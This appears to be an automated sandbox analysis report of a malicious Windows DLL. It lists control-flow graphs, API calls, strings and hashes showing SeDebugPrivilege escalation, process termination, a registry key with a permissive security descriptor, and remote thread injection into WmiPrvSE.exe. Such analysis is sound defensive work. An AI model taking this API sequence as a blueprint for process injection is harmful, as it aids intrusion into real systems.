7464->7465 7466 140005a04 7465->7466 7467 140006e64 __free_lconv_num 5 API calls 7466->7467 7468 140005a18 7467->7468 7469 140006e64 __free_lconv_num 5 API calls 7468->7469 7470 140005a2c 7469->7470

                            Executed Functions

                            Function 0000000140001000 Relevance: 68.5, APIs: 31, Strings: 8, Instructions: 238registrythreadsleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 140001000-1400010fc call 140001ac0 call 1400037b0 VerSetConditionMask * 3 VerifyVersionInfoW call 140001ac0 call 140004680 call 140004388 call 14000e1c0 OpenProcess 13 14000117b-140001195 FindResourceA 0->13 14 1400010fe-140001113 OpenProcessToken 0->14 17 14000119b-1400011ae SizeofResource 13->17 18 1400013ed-14000141e call 140002200 13->18 15 140001172-140001175 CloseHandle 14->15 16 140001115-14000112b LookupPrivilegeValueW 14->16 15->13 16->15 19 14000112d-14000116a AdjustTokenPrivileges 16->19 17->18 21 1400011b4-1400011c2 LoadResource 17->21 19->15 22 14000116c call 14000e088 19->22 21->18 24 1400011c8-140001205 LockResource call 14000e1c0 call 140002268 call 140001d00 21->24 22->15 32 140001207-14000120d 24->32 33 140001260-1400012a5 call 140002224 RegCreateKeyExW 24->33 32->33 34 14000120f-14000121a 32->34 40 1400012ab-1400012d1 ConvertStringSecurityDescriptorToSecurityDescriptorW 33->40 41 14000137d-1400013eb CreateThread call 14000222c CreateThread Sleep SleepEx 33->41 36 140001220-140001225 34->36 38 140001256-14000125e 36->38 39 140001227-14000122d 36->39 38->33 38->36 39->38 43 14000122f-140001240 OpenProcess 39->43 44 1400012f3-14000132e RegCreateKeyExW 40->44 45 1400012d3-1400012ed RegSetKeySecurity LocalFree 40->45 41->18 43->38 49 140001242-140001250 TerminateProcess CloseHandle 43->49 46 140001372-140001377 RegCloseKey 44->46 47 140001330-14000136c call 14000e1c0 RegSetValueExW RegCloseKey 44->47 45->44 46->41 47->46 49->38
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: Process$CloseCreate$Handle$CurrentResource$ConditionFileMaskOpenSecurity$DescriptorFreeModuleProtectThreadTokenValueVirtual$AdjustConvertErrorFindInfoInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringTerminateVerifyVersionViewlstrcatlstrcmpilstrcpy
                            • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\nslookconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                            • API String ID: 1509639794-2014806160
                            • Opcode ID: ac2b49ce81bd6c42ce1db7e27b1c3ae78d14c7ed4c748a7f7454255202cddb2a
                            • Instruction ID: bf23c630407f85a7ea5e16fea4e65b4f13d99ae9d65eda87c83af15c2995c556
                            • Opcode Fuzzy Hash: ac2b49ce81bd6c42ce1db7e27b1c3ae78d14c7ed4c748a7f7454255202cddb2a
                            • Instruction Fuzzy Hash: D4B104B2204B8086EB16DF62F8447DA73A5F78CBC4F444529EB8A57BA4DF79C548CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0000000140001420 Relevance: 52.7, APIs: 26, Strings: 4, Instructions: 210memorynativethreadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 53 140001420-140001496 OpenProcess 55 140001761 53->55 56 14000149c-1400014af IsWow64Process 53->56 59 140001763-14000178e call 140002200 55->59 57 1400014b5-1400014c7 CloseHandle 56->57 58 14000175b CloseHandle 56->58 57->55 60 1400014cd-1400014e3 OpenProcess 57->60 58->55 60->55 63 1400014e9-140001501 K32GetModuleFileNameExW 60->63 64 140001503-14000151f PathFindFileNameW call 14000447c 63->64 65 140001525-140001544 NtQueryInformationProcess 63->65 64->59 64->65 67 140001758 65->67 68 14000154a-14000154e 65->68 67->58 68->67 70 140001554-140001574 OpenProcessToken 68->70 71 14000157a-14000159b GetTokenInformation 70->71 72 140001750 70->72 73 14000161b 71->73 74 14000159d-1400015a6 call 14000e088 71->74 72->67 76 14000161f-14000162d CloseHandle 73->76 74->73 79 1400015a8-1400015ba LocalAlloc 74->79 76->72 78 140001633-140001639 76->78 78->72 80 14000163f-14000164b call 140001790 78->80 79->73 81 1400015bc-1400015e0 GetTokenInformation 79->81 80->72 86 140001651-140001673 VirtualAllocEx 80->86 83 1400015e2-14000160a GetSidSubAuthorityCount GetSidSubAuthority LocalFree 81->83 84 14000160c-140001619 LocalFree 81->84 83->76 84->76 86->72 87 140001679-140001692 WriteProcessMemory 86->87 87->72 88 140001698-1400016ad GetModuleHandleA 87->88 89 1400016c4 88->89 90 1400016af-1400016c2 GetProcAddress 88->90 91 1400016c7-140001702 NtCreateThreadEx 89->91 90->91 91->72 92 140001704-14000170c 91->92 92->72 93 14000170e-140001711 92->93 94 140001713-140001718 93->94 95 14000171a-140001727 WaitForSingleObject 93->95 96 14000174a CloseHandle 94->96 97 140001745 95->97 98 140001729-14000173b GetExitCodeThread 95->98 96->72 97->96 98->97 99 14000173d-140001741 98->99 99->97
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: Process$Handle$Close$InformationLocalOpenToken$AllocAuthorityFileFreeModuleNameThread$AddressCodeCountCreateErrorExitFindLastMemoryObjectPathProcQuerySingleVirtualWaitWow64Write_invalid_parameter_noinfo
                            • String ID: @$NtCreateThreadEx$WmiPrvSE.exe$ntdll.dll
                            • API String ID: 3771203008-3049825241
                            • Opcode ID: 3514cc253bb78093fad6e6cd81122fcc17cc3d12463bdd0a6adf7bd84e0f1cd2
                            • Instruction ID: 0752c1ec2196954d4dd78b877c8bc8e9b8eaac9fa95afa931e72f9c214f7cb11
                            • Opcode Fuzzy Hash: 3514cc253bb78093fad6e6cd81122fcc17cc3d12463bdd0a6adf7bd84e0f1cd2
                            • Instruction Fuzzy Hash: 059115B5208B8082EB26DF13B8547DA67A1FBC8BC4F444425EB8A57BA4DF78C545C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0000000140001430 Relevance: 47.4, APIs: 23, Strings: 4, Instructions: 192memorylibrarynativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 100 140001430-140001496 OpenProcess 102 140001761 100->102 103 14000149c-1400014af IsWow64Process 100->103 106 140001763-14000178e call 140002200 102->106 104 1400014b5-1400014c7 CloseHandle 103->104 105 14000175b CloseHandle 103->105 104->102 107 1400014cd-1400014e3 OpenProcess 104->107 105->102 107->102 110 1400014e9-140001501 K32GetModuleFileNameExW 107->110 111 140001503-14000151f PathFindFileNameW call 14000447c 110->111 112 140001525-140001544 NtQueryInformationProcess 110->112 111->106 111->112 114 140001758 112->114 115 14000154a-14000154e 112->115 114->105 115->114 117 140001554-140001574 OpenProcessToken 115->117 118 14000157a-14000159b GetTokenInformation 117->118 119 140001750 117->119 120 14000161b 118->120 121 14000159d-1400015a6 call 14000e088 118->121 119->114 123 14000161f-14000162d CloseHandle 120->123 121->120 126 1400015a8-1400015ba LocalAlloc 121->126 123->119 125 140001633-140001639 123->125 125->119 127 14000163f-14000164b call 140001790 125->127 126->120 128 1400015bc-1400015e0 GetTokenInformation 126->128 127->119 133 140001651-140001673 VirtualAllocEx 127->133 130 1400015e2-14000160a GetSidSubAuthorityCount GetSidSubAuthority LocalFree 128->130 131 14000160c-140001619 LocalFree 128->131 130->123 131->123 133->119 134 140001679-140001692 WriteProcessMemory 133->134 134->119 135 140001698-1400016ad GetModuleHandleA 134->135 136 1400016c4 135->136 137 1400016af-1400016c2 GetProcAddress 135->137 138 1400016c7-140001702 NtCreateThreadEx 136->138 137->138 138->119 139 140001704-14000170c 138->139 139->119 140 14000170e-140001711 139->140 141 140001713-140001718 140->141 142 14000171a-140001727 WaitForSingleObject 140->142 143 14000174a CloseHandle 141->143 144 140001745 142->144 145 140001729-14000173b GetExitCodeThread 142->145 143->119 144->143 145->144 146 14000173d-140001741 145->146 146->144
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: Process$Handle$CloseInformationOpenToken$AllocAuthorityFileLocalModuleName$AddressCountErrorFindFreeLastMemoryPathProcQueryVirtualWow64Write_invalid_parameter_noinfo
                            • String ID: @$NtCreateThreadEx$WmiPrvSE.exe$ntdll.dll
                            • API String ID: 2255831085-3049825241
                            • Opcode ID: 47b3d0b3ed36e6396495094337ec394e1caccf78b7f063057fbffef1411bbc00
                            • Instruction ID: 40171889a33b00fbdbaa4a1087c60cb035ef3b8b29c7ed5559afa5d3f01e1a8c
                            • Opcode Fuzzy Hash: 47b3d0b3ed36e6396495094337ec394e1caccf78b7f063057fbffef1411bbc00
                            • Instruction Fuzzy Hash: D78115B5208B8082EB26DF13B8547EA67A1BB8CBC4F444425EF8E57BA4DF79C549C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0000000140001F00 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 124pipesleepmemoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: NamedPipe$DescriptorDisconnectFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclEntriesLocalReadWrite
                            • String ID: \\.\pipe\nslookchildproc64
                            • API String ID: 3584777297-1363353281
                            • Opcode ID: b37e6f432c6f2a1d5e47efd98d1f3928e00fe339458e3306e41edaff54000244
                            • Instruction ID: 8266934b804761f0116b471cbf32ba5db4d27a63d11a78053db2714d9453cadb
                            • Opcode Fuzzy Hash: b37e6f432c6f2a1d5e47efd98d1f3928e00fe339458e3306e41edaff54000244
                            • Instruction Fuzzy Hash: CF5158B2614B908AE725CF22F8447DA33A4F74CB88F445625FB4A57AA8DF78C148CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0000000140002338 Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled_invalid_parameter_noinfo
                            • String ID:
                            • API String ID: 59578552-0
                            • Opcode ID: 43c93713ae73b0e7451d84b403ce93ecb4e66f19edebc87764313757e15ad245
                            • Instruction ID: ff8acf046e0b8ba5d736ac790d6b35c728020170d6d4f3489dfd8d0d71a94e49
                            • Opcode Fuzzy Hash: 43c93713ae73b0e7451d84b403ce93ecb4e66f19edebc87764313757e15ad245
                            • Instruction Fuzzy Hash: 19E012B0E4515185F52FF777BC433ED20912B4E3A5F600215B325473F2CA7A45D24622
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0000000140001AC0 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124filestringmemoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcatlstrcmpilstrcpy
                            • String ID: .text$C:\Windows\System32\
                            • API String ID: 851879939-832442975
                            • Opcode ID: 2565a63028710b063ea01d420fb0ced845f2080497b2aa49b69043651cf8b550
                            • Instruction ID: de66b9a638ad4e6397e737a92eb97871902827a7b6dd6415210a430990ac8e68
                            • Opcode Fuzzy Hash: 2565a63028710b063ea01d420fb0ced845f2080497b2aa49b69043651cf8b550
                            • Instruction Fuzzy Hash: 9C513B76204B8182EB62CF12F4547DAB7A1FB8DBC4F444625EB8A13B68DF38D449CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0000000140002354 Relevance: 10.6, APIs: 7, Instructions: 94COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: __scrt_fastfail$__scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock
                            • String ID:
                            • API String ID: 2735655165-0
                            • Opcode ID: 07980ee9f757e7180614720c71bfc57c5b69797cca90f1fcb78ae8c300b580c2
                            • Instruction ID: 6224df3126cdcf51118130dc90d299fefb920cbf6a08a6429a847f4dd66625c5
                            • Opcode Fuzzy Hash: 07980ee9f757e7180614720c71bfc57c5b69797cca90f1fcb78ae8c300b580c2
                            • Instruction Fuzzy Hash: C2315CB160064186FA6BEB67F4553EE2391AB4E3C4F854425BB4A0B2F7DE78C9498341
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0000000140001D00 Relevance: 7.6, APIs: 5, Instructions: 124COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 253 140001d00-140001d6c call 140002268 * 2 K32EnumProcesses 258 140001e72-140001ea8 call 140002224 * 2 call 140002200 253->258 259 140001d72-140001d89 253->259 261 140001e6a 259->261 262 140001d8f-140001d9f 259->262 261->258 264 140001da0-140001dbb OpenProcess 262->264 266 140001dc1-140001dda K32EnumProcessModules 264->266 267 140001e4e-140001e54 264->267 270 140001e45-140001e48 CloseHandle 266->270 271 140001ddc-140001deb 266->271 267->264 268 140001e5a-140001e62 267->268 268->261 270->267 273 140001ded 271->273 274 140001e40 271->274 276 140001df0-140001e13 ReadProcessMemory 273->276 274->270 277 140001e15-140001e2c 276->277 278 140001e38-140001e3e 276->278 277->278 279 140001e2e-140001e36 277->279 278->274 278->276 279->278 280 140001ea9-140001eb2 279->280 281 140001eb4-140001ee6 280->281 282 140001eeb-140001eee 280->282 281->270 282->270
                            APIs
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: Process$Enum$CloseHandleMemoryModulesOpenProcessesRead
                            • String ID:
                            • API String ID: 1213742203-0
                            • Opcode ID: 896a160a0ee285f6e8d8bd3a28e12ab9ce5b7e5b3218f098ad5d1cb74e6b639a
                            • Instruction ID: f6fd842149fe76d569e5107b40fe64d6f9b3009bacd429039626d91551246fa1
                            • Opcode Fuzzy Hash: 896a160a0ee285f6e8d8bd3a28e12ab9ce5b7e5b3218f098ad5d1cb74e6b639a
                            • Instruction Fuzzy Hash: C9513AB261968486EB65DF62F85439AB3A0F789BC0F444125FF8A477A5DF39C541CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0000000140008BFC Relevance: 3.1, APIs: 2, Instructions: 73COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 283 140008bfc-140008c17 284 140008c1a-140008c43 283->284 285 140008c45-140008c4a 284->285 286 140008c4f-140008c58 284->286 287 140008cde-140008ce7 285->287 288 140008c5a-140008c5d 286->288 289 140008c70 286->289 287->284 293 140008ced-140008d07 287->293 290 140008c69-140008c6e 288->290 291 140008c5f-140008c67 288->291 292 140008c75-140008c86 GetStdHandle 289->292 290->292 291->292 294 140008c93 292->294 295 140008c88-140008c91 GetFileType 292->295 296 140008c95-140008c97 294->296 295->296 297 140008cb9-140008cd1 296->297 298 140008c99-140008ca4 296->298 297->287 301 140008cd3-140008cd7 297->301 299 140008ca6-140008cab 298->299 300 140008cad-140008cb0 298->300 299->287 300->287 302 140008cb2-140008cb7 300->302 301->287 302->287
                            APIs
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: FileHandleType
                            • String ID:
                            • API String ID: 3000768030-0
                            • Opcode ID: 88e8f54f1ce44bcd5c61adcb05f2c06c036122a0376d20a0d62f23662d395c44
                            • Instruction ID: 955487c27205d1d318e8cafe44fec18a402d7959bccc7748bd79d98d32d72b51
                            • Opcode Fuzzy Hash: 88e8f54f1ce44bcd5c61adcb05f2c06c036122a0376d20a0d62f23662d395c44
                            • Instruction Fuzzy Hash: DE31B172615B4481FB76CB16A5907A92A60F349BF0F64031AFFAA0B3F0CB34D4A1C350
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0000000140002120 Relevance: 3.1, APIs: 2, Instructions: 56sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 303 140002120-140002169 call 140002268 * 2 308 140002170-140002185 K32EnumProcesses 303->308 309 1400021e4-1400021ed Sleep 308->309 310 140002187-14000219a 308->310 309->308 311 14000219c 310->311 312 1400021cf-1400021e0 call 140003ea0 310->312 314 1400021a0-1400021a4 311->314 312->309 315 1400021a6-1400021aa 314->315 316 1400021bb 314->316 318 1400021b0-1400021b3 315->318 322 1400021bf call 140001420 316->322 323 1400021bf call 140001430 316->323 319 1400021b5-1400021b9 318->319 320 1400021c8-1400021cd 318->320 319->316 319->318 320->312 320->314 321 1400021c3 321->320 322->321 323->321
                            APIs
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: EnumProcessesSleep
                            • String ID:
                            • API String ID: 4263938415-0
                            • Opcode ID: 2b77bc7fee134ea4cfd489f680b2e42101ab2c75c76b54298c3d5fb89b619286
                            • Instruction ID: 1aac10474dc28f1596d549f3006f364ff74f75de67eb5a76958a3eaa47b5d0ec
                            • Opcode Fuzzy Hash: 2b77bc7fee134ea4cfd489f680b2e42101ab2c75c76b54298c3d5fb89b619286
                            • Instruction Fuzzy Hash: AD11517231465087F726CB13E854B9AB7A1F79DBC4F554214EF8947BA4CB39D501CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 000000014000624C Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                            • String ID:
                            • API String ID: 1239891234-0
                            • Opcode ID: f9e8d53756511d59eebaaf56c323f925c02571bcc974eb49a74ce55441d923b8
                            • Instruction ID: a94002c5647d5c3c02ea8f9a8649a67cf53e66a952d72cc81a498371b09bfe9c
                            • Opcode Fuzzy Hash: f9e8d53756511d59eebaaf56c323f925c02571bcc974eb49a74ce55441d923b8
                            • Instruction Fuzzy Hash: 8C314B72214B8096EB65CB26F8407DE73A4F788794F500226FB9D53BA9DF38C6598B40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000000014000B2CC Relevance: 7.8, APIs: 5, Instructions: 321fileCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: ErrorFileLastWrite$Console
                            • String ID:
                            • API String ID: 786612050-0
                            • Opcode ID: 6185b47001686f3d2c7c36614dcf54a529ba94c280bae09b8bc5057c92ad5623
                            • Instruction ID: 85cb9dd672ade054a5f4c097fae1c78a2e91ee8a46319035c81f3b3cfd1494ad
                            • Opcode Fuzzy Hash: 6185b47001686f3d2c7c36614dcf54a529ba94c280bae09b8bc5057c92ad5623
                            • Instruction Fuzzy Hash: B4D1F2B2708A809AE702CF66E4443DD7BB1F7487D8F544116EF8E57BA9DA38C15AC700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0000000140003B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86libraryloaderCOMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 385 140003b90-140003bcd 386 140003bd3-140003bd6 385->386 387 140003cbd 385->387 388 140003cbf-140003cdb 386->388 389 140003bdc 386->389 387->388 390 140003bdf 389->390 391 140003cb5 390->391 392 140003be5-140003bf3 390->392 391->387 393 140003bf5-140003bf8 392->393 394 140003c00-140003c1f call 14000e2d8 392->394 395 140003c97-140003ca6 GetProcAddress 393->395 396 140003bfe 393->396 401 140003c21-140003c2a call 14000e088 394->401 402 140003c77-140003c8c 394->402 395->391 399 140003ca8-140003cb3 395->399 398 140003c6b-140003c72 396->398 398->390 399->388 407 140003c59-140003c63 401->407 408 140003c2c-140003c41 call 140005c00 401->408 402->395 404 140003c8e-140003c91 call 14000e0f0 402->404 404->395 407->398 408->407 411 140003c43-140003c57 call 14000e2d8 408->411 411->402 411->407
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: Library$Load$AddressErrorFreeLastProc
                            • String ID: api-ms-
                            • API String ID: 2559590344-2084034818
                            • Opcode ID: 0dd4a504bcac95c60dc9cd98dc9c14b393eae98d983e4de2bbe092bad3b89234
                            • Instruction ID: df373b6ec730a9bfd404b8efd7c468a6aa4631319b472c9a20adb42830e09c27
                            • Opcode Fuzzy Hash: 0dd4a504bcac95c60dc9cd98dc9c14b393eae98d983e4de2bbe092bad3b89234
                            • Instruction Fuzzy Hash: B8316FB1316A8095FE27DB07B804BE56398B74CBE4F594525EF1AAB7A0EF38D4858700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000000014000CC2C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                            • String ID: CONOUT$
                            • API String ID: 3230265001-3130406586
                            • Opcode ID: 4b28fb120dd779269088581c8e5323345c9365922b55cfb3199524c895469e8a
                            • Instruction ID: ab19db9496d12aa9779ee58175a21b54783d13adca231a0f01b107f525bca11e
                            • Opcode Fuzzy Hash: 4b28fb120dd779269088581c8e5323345c9365922b55cfb3199524c895469e8a
                            • Instruction Fuzzy Hash: 2C115872220B8086F7528B93F84479AB6A0F78CBE4F484224FB5E877B4DF78C9448744
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0000000140005294 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: AddressFreeHandleLibraryModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 4061214504-1276376045
                            • Opcode ID: 085014a8c8cfb982fa856900b36fb1a1973ae4baa0dd7c60995248b851b3e67d
                            • Instruction ID: 9859a333bd7b57d9ec38d5dcd9ab6801432730027c79301f89632c4922d5d6c1
                            • Opcode Fuzzy Hash: 085014a8c8cfb982fa856900b36fb1a1973ae4baa0dd7c60995248b851b3e67d
                            • Instruction Fuzzy Hash: BAF0DAB1221A4481FB5ADB92F8843E52360AB4DBD2F541426B60B575B4DE78C5C89710
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000000014000BC18 Relevance: 7.7, APIs: 5, Instructions: 203COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                            • String ID:
                            • API String ID: 2210144848-0
                            • Opcode ID: 968cc10c74ddc4af2d3d986e3a330590a9d59a8d131bfa39f0543e3baa1f8aad
                            • Instruction ID: 4d66de13f1315c420de4639c2bc0a19256bd87756d4b344f67744beb2c30b217
                            • Opcode Fuzzy Hash: 968cc10c74ddc4af2d3d986e3a330590a9d59a8d131bfa39f0543e3baa1f8aad
                            • Instruction Fuzzy Hash: 9B819BB2620A5089FB62DF66E8907EC66A1FB4CBD8F444116FF0A677F6EB358445C310
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000000014000CF48 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: _set_statfp
                            • String ID:
                            • API String ID: 1156100317-0
                            • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                            • Instruction ID: 3c234b152ff464f4ff42ef9096345955c09007f11b3e64a1b63be97e3aa2707f
                            • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                            • Instruction Fuzzy Hash: C31173F2A75A0201F666D326F4657FD10436B6D3F4F445635BB6B077F6CA3498418112
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00000001400039F8 Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: ErrorLast
                            • String ID:
                            • API String ID: 1452528299-0
                            • Opcode ID: 01165759b3121519fe1ef140df1b2a9b00668b61944ea1a8fdd598fc9298aa1e
                            • Instruction ID: ee40bbe069c6a25a0cbd135e97ebc073c2ba55ff1da5d0fc5055a9fc3e7fc3ba
                            • Opcode Fuzzy Hash: 01165759b3121519fe1ef140df1b2a9b00668b61944ea1a8fdd598fc9298aa1e
                            • Instruction Fuzzy Hash: E611B2B031164486FA67D723B8443E972A9AB4DBE0F184625BF65173F6DF38C8458301
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000000014000B9BC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: ErrorFileLastWrite
                            • String ID: U
                            • API String ID: 442123175-4171548499
                            • Opcode ID: f02c9b90154e3edead2ad0a942b96358295ea216c40d1ad9c1893ef4f954e687
                            • Instruction ID: d6c2a18bdce53c2565363804d56b9cf82c27b3c0d25e7440da819e00cd40361f
                            • Opcode Fuzzy Hash: f02c9b90154e3edead2ad0a942b96358295ea216c40d1ad9c1893ef4f954e687
                            • Instruction Fuzzy Hash: 14417EB2714A8086EB61CF66F8443EA67A1F798BD4F844021EF8D877A8EB78C541C741
                            Uniqueness

                            Uniqueness Score: -1.00%

